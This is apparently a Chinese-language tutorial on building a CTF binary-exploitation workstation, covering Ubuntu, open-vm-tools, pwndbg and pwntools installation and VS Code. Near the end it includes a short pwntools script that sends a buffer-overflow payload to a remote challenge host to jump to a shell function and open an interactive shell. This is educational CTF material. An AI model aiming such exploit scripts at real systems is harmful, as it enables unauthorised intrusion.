欲想善其事必先利其器,无论是网络安全何种方向,都有自己经常用的工具环境,那么PWN也一样,拥有一个完善的工具环境,可以节约我们很多事,也不会在关键时候因为外在条件而卡壳,可谓逢山开山,逢水架桥,成为一个牛逼pwn手。
系统选择
系统选择肯定是Ubuntu了,毫无疑问,直接去linux官网下载,版本可选择近几年的,不要太老:
VMware Tools
安装虚拟机,那么VMware Tools是必不可少的,但是Vmware带的闭源版本不好装,而官方文档,也给出这一点:
所以我们选择安装Open-VM-Tools:
命令:sudo apt install open-vm-tools
sudo apt install open-vm-tools-desktop
随后重启,在登录界面选择选xorg,wayland没有剪贴板同步和文件拖拽,现在就可以实现和主机交互:
pwndbg pwndbg是gdb一个插件,专门用来调试pwn题,新增如下功能:
命令
arena
bins
Heapbase
heapinfo
Parseheap
tracemalloc
cylic
reabse
stack
retaddr
canary
got
plt
Hexdump
安装命令:
apt install git
git clone https://github.com/pwndbg/pwndbg
随后进入pwndbg目录,运行setup.sh,开始安装:
安装成功之后,我们在终端输入gdb,显示pwndbg,就证明安装成功:
pwntools pwntools是python的一个库,经常用来写脚本,安装命令如下:
apt install python3-pip
pip install pwntools
使用示例:
from pwn import * io =remote('61.147.171.105',63315) bin_sh = 0x400762 My_payload = (b'a'*0xA8+p64(bin_sh)) io.sendline(My_payload) io.interactive()
Visual Studio Code 编写脚本建议使用Visual Studio Code,直接在商店中安装,在扩展搜索chinese,进行汉化:
